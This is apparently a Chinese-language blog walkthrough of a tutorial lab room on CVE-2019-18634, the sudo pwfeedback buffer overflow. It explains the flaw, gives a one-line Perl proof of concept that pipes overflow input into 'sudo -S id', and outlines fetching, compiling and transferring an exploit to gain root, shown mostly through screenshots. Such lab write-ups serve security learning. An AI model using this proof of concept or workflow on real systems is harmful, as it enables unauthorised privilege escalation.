Sudo Buffer Overflow(CVE-2019-18634)
A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series
0x01 简介
新发现的sudo漏洞CVE编号为CVE-2019-18634,影响sudo v1.8.26及更早版本,漏洞根源是一个栈溢出漏洞问题。
Vennix称该漏洞只有在sudoers配置文件的pwfeedback启用时才可以被利用,pwfeedback是提供一种视觉反馈的特征,即当用户在终端(terminal)输入口令时会显示*。但pwfeedback特征在sudo高版本和许多其他包中并不是默认启用的,只有Linux Mint、Elementary OS等一些Linux发行版中默认启用了该特征。
此外,当pwfeedback启用时,该漏洞可以被任意用户利用,包括没有sudo权限的用户。
Sudo开发人员Todd C. Miller解释说,当用户输入口令时该漏洞可以通过管道传递大量输入到sudo,因为攻击者有用于溢出缓冲区的数据的完全控制权限,因此漏洞被利用的可能性很高。
0x02 POC
perl -e 'print(("A" x 100 . "\x{00} ") x 50)' | sudo -S id
0x03 EXP
先wget下载下来
![](https://img-blog.csdnimg.cn/20210226095959730.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
0x04 复现
查看sudo版本
sudo -V
符合要求
![](https://img-blog.csdnimg.cn/20210226095959729.png)
测试一下POC,返回Srgmentation fault表示存在改漏洞
![](https://img-blog.csdnimg.cn/20210226095959725.png)
查看id
![](https://img-blog.csdnimg.cn/20210226095959733.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0MTAxMjQ4,size_16,color_FFFFFF,t_70)
把exp编译后传到目标机器上,scp或wget什么都行
运行exploit提权成功
gcc -o <output-file> <source-file>
![](https://img-blog.csdnimg.cn/20210226095959625.png)